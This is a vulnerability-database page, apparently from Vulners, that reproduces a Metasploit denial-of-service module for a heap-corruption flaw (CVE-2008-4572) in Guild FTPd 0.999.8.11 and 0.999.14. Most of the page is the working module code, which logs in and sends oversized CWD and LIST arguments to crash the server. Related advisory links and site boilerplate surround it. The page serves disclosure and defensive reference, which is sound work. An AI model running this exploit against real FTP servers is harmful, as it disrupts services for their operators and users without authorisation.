Lucene search
K

Guild FTPd 0.999.8.11/0.999.14 Heap Corruption

🗓️ 09 Jan 2009 05:33:26Reported by kris katterjohn <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 40 Views

Guild FTPd 0.999.8.11/0.999.14 Heap Corruption, Vulnerable to heap corruption, requires valid login for CWD and LIS

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2008-4572
15 Oct 200820:00
attackerkb
Circl
CVE-2008-4572
12 Oct 200800:00
circl
CVE
CVE-2008-4572
15 Oct 200818:12
cve
Cvelist
CVE-2008-4572
15 Oct 200818:12
cvelist
NVD
CVE-2008-4572
15 Oct 200820:00
nvd
OpenVAS
GuildFTPd CWD and LIST Command Heap Overflow Vulnerability
21 Oct 200800:00
openvas
OpenVAS
GuildFTPd CWD and LIST Command Heap Overflow Vulnerability
21 Oct 200800:00
openvas
Packet Storm
Guild FTPd 0.999.8.11/0.999.14 Heap Corruption
31 Aug 202400:00
packetstorm
Prion
Heap overflow
15 Oct 200820:00
prion
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Ftp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Guild FTPd 0.999.8.11/0.999.14 Heap Corruption',
      'Description'    => %q{
        Guild FTPd 0.999.8.11 and 0.999.14 are vulnerable
        to heap corruption.  You need to have a valid login
        so you can run CWD and LIST.
      },
      'Author'         => 'kris katterjohn',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2008-4572' ],
          [ 'OSVDB', '49045' ],
          [ 'EDB', '6738']
        ],
      'DisclosureDate' => '2008-10-12'))

    # They're required
    register_options([
      OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ], fallbacks: ['USERNAME']),
      OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ], fallbacks: ['PASSWORD'])
    ])
  end

  def run
    return unless connect_login

    print_status("Sending commands...")

    # We want to try to wait for responses to these
    resp = send_cmd(['CWD', '/.' * 124])
    resp = send_cmd(['LIST', 'X' * 100])

    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Sep 2022 11:59Current
7High risk
Vulners AI Score7
CVSS 210
EPSS0.60692
40